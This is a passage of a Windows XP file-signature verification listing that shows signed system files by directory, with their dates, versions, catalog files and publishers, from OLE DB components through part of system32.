msdarem.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdaremr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdfmap.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\system\ole db]
msdadc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdaenum.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdaer.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdaora.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdaorar.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdaosp.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdaps.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdasc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdasql.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdasqlr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdatl3.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdatt.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdaurl.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msxactps.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
oledb32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
oledb32r.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
sqlxmlx.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\internet explorer]
hmmapi.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
iexplore.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\internet explorer\connection wizard]
icwconn.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
icwconn1.exe 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
icwconn2.exe 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
icwdl.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
icwhelp.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
icwres.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
icwrmind.exe 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
icwtutor.exe 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
icwutil.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
inetwiz.exe 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
isignup.exe 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
trialoc.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\movie maker]
moviemk.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wmmfilt.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wmmres.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wmmutil.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\msn gaming zone\windows]
bckg.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
bckgres.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
bckgzm.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
chkr.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
chkrres.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
chkrzm.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
cmnclim.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
cmnresm.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
hrtz.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
hrtzres.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
hrtzzm.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
rvse.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
rvseres.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
rvsezm.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
shvl.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
shvlres.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
shvlzm.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
uniansi.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
zclientm.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
zcorem.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
zeeverm.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
znetm.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
zoneclim.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
zonelibm.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
[c:\program files\netmeeting]
callcont.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cb32.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
conf.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
confmrsl.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
dcap32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
h323cc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
mst120.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
mst123.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
nac.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
nmas.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
nmasnt.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
nmchat.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
nmcom.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
nmft.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
nmoldwb.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
nmwb.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
rrcm.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wb32.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\outlook express]
msimn.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msoe.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msoeres.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
oeimport.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
oemig50.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
oemiglib.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
setup50.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wab.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wabfind.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wabimp.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wabmig.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\windows media player]
dlimport.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
mplayer2.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
npdrmv2.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
npdsplay.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
npwmsdrm.dll 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
setup_wm.exe 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wmplayer.exe 9/22/2004 2:5.1 Signed wmp10.CAT Microsoft Windows Component Publisher
wmpvis.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\windows nt]
dialer.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
htrn_jis.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\windows nt\accessories]
wordpad.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\windows nt\pinball]
pinball.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
[c:\windows]
explorer.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
hh.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
notepad.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
regedit.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
taskman.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
twain.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
twain_32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
twunk_16.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
twunk_32.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
vmmreg32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
winhelp.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
winhlp32.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\apppatch]
acgenral.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
aclayers.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
aclua.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
acspecfc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
acverfyr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
acxtrnal.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
apphelp.sdb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
drvmain.sdb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msimain.sdb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
sysmain.sdb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\fonts]
dosapp.fon 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
framd.ttf 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
framdit.ttf 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
micross.ttf 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
modern.fon 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
script.fon 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
tahoma.ttf 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
tahomabd.ttf 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
vgaoem.fon 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\help]
bnts.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
nvcpar.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpcs.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpda.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpde.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpel.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpeng.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpes.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpesm.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpfi.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpfr.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcphe.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcphu.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpit.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpja.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpko.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpl.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpnl.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpno.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcppl.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcppt.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpptb.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpru.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpsk.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpsl.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpsv.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpth.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcptr.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpzhc.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvcpzht.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpar.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpcs.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpda.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpde.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpel.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpeng.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpes.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpesm.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpfi.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpfr.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcphe.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcphu.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpit.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpja.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpko.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcplen.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpnl.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpno.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcppl.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcppt.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpptb.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpru.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpsk.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpsl.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpsv.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpth.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcptr.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpzhc.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
nvwcpzht.hlp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
sniffpol.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
sstub.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
tshoot.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\help\tours\mmtour]
tour.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
[c:\windows\ime]
mscandui.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
softkbd.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
spgrmr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
sptip.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\inf]
unregmp2.exe 9/22/2004 2:5.1 Signed wmp10.CAT Microsoft Windows Component Publisher
[c:\windows\msagent]
agentanm.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agentctl.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agentdp2.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agentdpv.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agentmpx.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agentpsh.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agentsr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agentsvr.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agtctl15.tlb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agtintl.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
mslwvtts.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\msagent\intl]
agt0405.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0406.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0407.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0408.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0409.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt040b.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt040c.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt040e.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0410.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0413.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0414.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0415.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0416.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0419.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt041d.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt041f.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0816.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
agt0c0a.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\mui]
muisetup.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
[c:\windows\nview]
generic.tvp 1/23/2003 2:5.00,2:5.1 Signed oem6.CAT Microsoft Windows Hardware Compatibility Publisher
[c:\windows\pchealth\helpctr\binaries]
brpinfo.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
hcappres.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
helpctr.exe 4/1/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
helphost.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
helpsvc.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msconfig.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msinfo.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
notiflag.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
pchshell.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
pchsvc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\pchealth\uploadlb\binaries]
uploadm.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\resources\themes\luna]
luna.msstyles 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\resources\themes\luna\shell\homestead]
shellstyle.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\resources\themes\luna\shell\metallic]
shellstyle.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\resources\themes\luna\shell\normalcolor]
shellstyle.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\srchasst]
msgr3en.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
nls302en.lex 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
srchctls.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
srchui.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\system]
avicap.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
avifile.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
commdlg.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
keyboard.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
lzexpand.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
mciavi.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
mciseq.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
mciwave.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
mmsystem.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
mmtask.tsk 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
mouse.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msvideo.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
olecli.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
olesvr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
shell.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
sound.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
stdole.tlb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
system.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
tapi.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
timer.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ver.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
vga.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wfwnet.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
winspool.drv 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\windows\system32]
12520437.cpx 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
12520850.cpx 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
6to4svc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
aaaamon.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
access.cpl 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
acctres.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
accwiz.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
acledit.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
aclui.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
activeds.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
activeds.tlb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
actmovie.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
actxprxy.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
admparse.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
adptif.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
adsldp.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
adsldpc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
adsmsext.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
